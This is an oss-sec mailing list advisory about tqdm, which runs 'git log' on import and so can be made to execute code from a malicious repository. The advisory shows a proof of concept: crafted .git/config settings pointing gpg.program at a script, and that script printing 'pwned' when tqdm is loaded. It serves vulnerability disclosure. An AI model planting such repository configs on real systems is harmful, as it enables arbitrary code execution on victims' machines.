oss-sec mailing list archives
tqdm: insecure use of git
From: Jakub Wilk <jwilk () jwilk net>
Date: Sun, 25 Dec 2016 21:47:43 +0100
tqdm <https://github.com/tqdm/tqdm> is a "fast, extensible progress bar for Python".
When you import tqdm, the tqdm._version module executes the following command: git log -n 1 --oneline This was meant to check if the user is running a pre-release version of tqdm.But cwd might be a part of an unrelated git repository, possibly a malicious one. At least with git 2.10 or later, it's possible to craft a repo in which "git log" executes arbitrary code:
$ tail -n4 /tmp/.git/config
[log]
showSignature = true
[gpg]
program = /tmp/moogpg
$ tail -n4 /tmp/moogpg
#!/bin/sh
exec > /dev/tty 2>&1
cowsay pwned
sleep 9999
$ cd /tmp
$ pydoc tqdm
_______
< pwned >
-------
\ ^__^
\ (oo)\_______
(__)\ )\/\
||----w |
|| ||
Upstream bug report:
https://github.com/tqdm/tqdm/issues/328
Affected versions: v4.4.1 and later.
--
Jakub Wilk
Current thread:
- tqdm: insecure use of git Jakub Wilk (Dec 25)
- Re: tqdm: insecure use of git cve-assign (Dec 25)
- Re: tqdm: insecure use of git Jakub Wilk (Dec 27)
- Re: tqdm: insecure use of git cve-assign (Dec 28)
- Re: tqdm: insecure use of git Jakub Wilk (Dec 27)
- Re: tqdm: insecure use of git cve-assign (Dec 25)